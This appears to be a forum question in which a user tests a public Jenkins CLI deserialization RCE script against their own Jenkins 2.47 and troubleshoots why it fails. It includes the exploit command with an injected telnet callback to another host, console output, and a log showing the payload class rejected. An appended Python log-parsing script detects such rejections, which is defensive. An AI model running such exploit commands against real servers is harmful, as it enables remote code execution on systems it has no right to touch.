I have Jenkins 2.47 with nginx. I'm trying to verify the exploit using the jenkins_cli_rmi_rce.
I'm expecting to see the tcpdump output below to show the telnet attempting to connect on port 8081 (verified this by running this telnet cmd directly on appserver).
Don't think the exploit is working on my setup but I may be missing something obvious.
```
root@appserver:~/cve-2016-0792/java_deserialization_exploits/Jenkins# python jenkins_cli_rmi_rce.py localhost:8080 'telnet 10.0.2.15 8081'
[*] Target IP: localhost
[*] Target PORT: 8080
[*] Retrieving the Jenkins CLI port
[*] Connecting to Jenkins CLI on localhost:38539
[*] Sending headers
Jan 26, 2017 6:47:48 PM hudson.TcpSlaveAgentListener$ConnectionHandler run
INFO: Accepted connection #15 from /127.0.0.1:41626
[*] Received "Welcome
"
[*] Received "<===[JENKINS REMOTING CAPACITY]===>rO0ABXNyABpodWRzb24ucmVtb3RpbmcuQ2FwYWJpbGl0eQAAAAAAAAABAgABSgAEbWFza3hwAAAAAAAAAP4="
```
Nothing on tcpdump
```
root@appserver:~# tcpdump port 8081 -i any
tcpdump: verbose output suppressed, use -v or -vv for full protocol decode
listening on any, link-type LINUX_SLL (Linux cooked), capture size 65535 bytes
```
The Jenkins log shows the following output:
```
Jan 26, 2017 6:47:48 PM hudson.init.impl.InstallUncaughtExceptionHandler$DefaultUncaughtExceptionHandler uncaughtException
SEVERE: A thread (TCP agent connection handler #15 with /127.0.0.1:41626/88) died unexpectedly due to an uncaught exception, this may leave your Jenkins in a bad way and is usually indicative of a bug in the code.
java.lang.SecurityException: Rejected: sun.reflect.annotation.AnnotationInvocationHandler
    at hudson.remoting.Capability$1.resolveClass(Capability.java:137)
    at java.io.ObjectInputStream.readNonProxyDesc(ObjectInputStream.java:1817)
    at java.io.ObjectInputStream.readClassDesc(ObjectInputStream.java:1711)
    at java.io.ObjectInputStream.readOrdinaryObject(ObjectInputStream.java:1982)
    at java.io.ObjectInputStream.readObject0(ObjectInputStream.java:1533)
    at java.io.ObjectInputStream.readObject(ObjectInputStream.java:420)
    at hudson.remoting.Capability.read(Capability.java:140)
    at hudson.remoting.ChannelBuilder.negotiate(ChannelBuilder.java:391)
    at hudson.remoting.ChannelBuilder.b[+] Sent payload
uild(ChannelBuilder.java:310)
    at hudson.cli.CliProtocol$Handler.runCli(CliProtocol.java:95)
    at hudson.cli.CliProtocol$Handler.run(CliProtocol.java:82)
    at hudson.cli.CliProtocol.handle(CliProtocol.java:58)
    at hudson.TcpSlaveAgentListener$ConnectionHandler.run(TcpSlaveAgentListener.java:230)
```
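
The Jenkins log in the post records the remoting layer refusing to deserialize a class (`SecurityException: Rejected: ...` raised from `Capability$1.resolveClass`). As an added example, not part of the original post or of the exploit repository, this Python script pulls such rejections out of a Jenkins log and attributes each one to the connecting peer, which is the signal a defender would alert on. The sample log is constructed from lines quoted above; the function names and the IPv4-only peer pattern are assumptions of the example.

```python
import re
from collections import Counter

# Constructed sample: lines taken from the Jenkins log quoted in the post
# (the SEVERE message is abridged).
SAMPLE_LOG = """\
Jan 26, 2017 6:47:48 PM hudson.TcpSlaveAgentListener$ConnectionHandler run
INFO: Accepted connection #15 from /127.0.0.1:41626
Jan 26, 2017 6:47:48 PM hudson.init.impl.InstallUncaughtExceptionHandler$DefaultUncaughtExceptionHandler uncaughtException
SEVERE: A thread (TCP agent connection handler #15 with /127.0.0.1:41626/88) died unexpectedly due to an uncaught exception
java.lang.SecurityException: Rejected: sun.reflect.annotation.AnnotationInvocationHandler
at hudson.remoting.Capability$1.resolveClass(Capability.java:137)
"""

# java.util.logging record header: "Jan 26, 2017 6:47:48 PM <logger> <method>"
TS_RE = re.compile(r"^([A-Z][a-z]{2} \d{1,2}, \d{4} \d{1,2}:\d{2}:\d{2} [AP]M) ")
# Peer of the agent/CLI connection whose handler thread died (IPv4 only here).
HANDLER_RE = re.compile(r"TCP agent connection handler #(\d+) with /([\d.]+):(\d+)")
# Class name refused during deserialization.
REJECT_RE = re.compile(r"java\.lang\.SecurityException: Rejected: ([\w.$]+)")


def find_rejections(log_text):
    """Return one record per class the remoting layer refused to deserialize."""
    events, ts, handler = [], None, None
    for line in log_text.splitlines():
        m = TS_RE.match(line)
        if m:  # start of a new log record: forget the previous record's peer
            ts, handler = m.group(1), None
            continue
        m = HANDLER_RE.search(line)
        if m:
            handler = (int(m.group(1)), m.group(2), int(m.group(3)))
            continue
        m = REJECT_RE.search(line)
        if m:
            # A rejection with no handler line in its record keeps peer = None.
            conn, ip, port = handler or (None, None, None)
            events.append({"time": ts, "conn": conn, "peer_ip": ip,
                           "peer_port": port, "rejected_class": m.group(1)})
    return events


def rejections_by_peer(events):
    """Count rejected deserialization attempts per source address."""
    return Counter(e["peer_ip"] for e in events)


if __name__ == "__main__":
    for event in find_rejections(SAMPLE_LOG):
        print(event)
```
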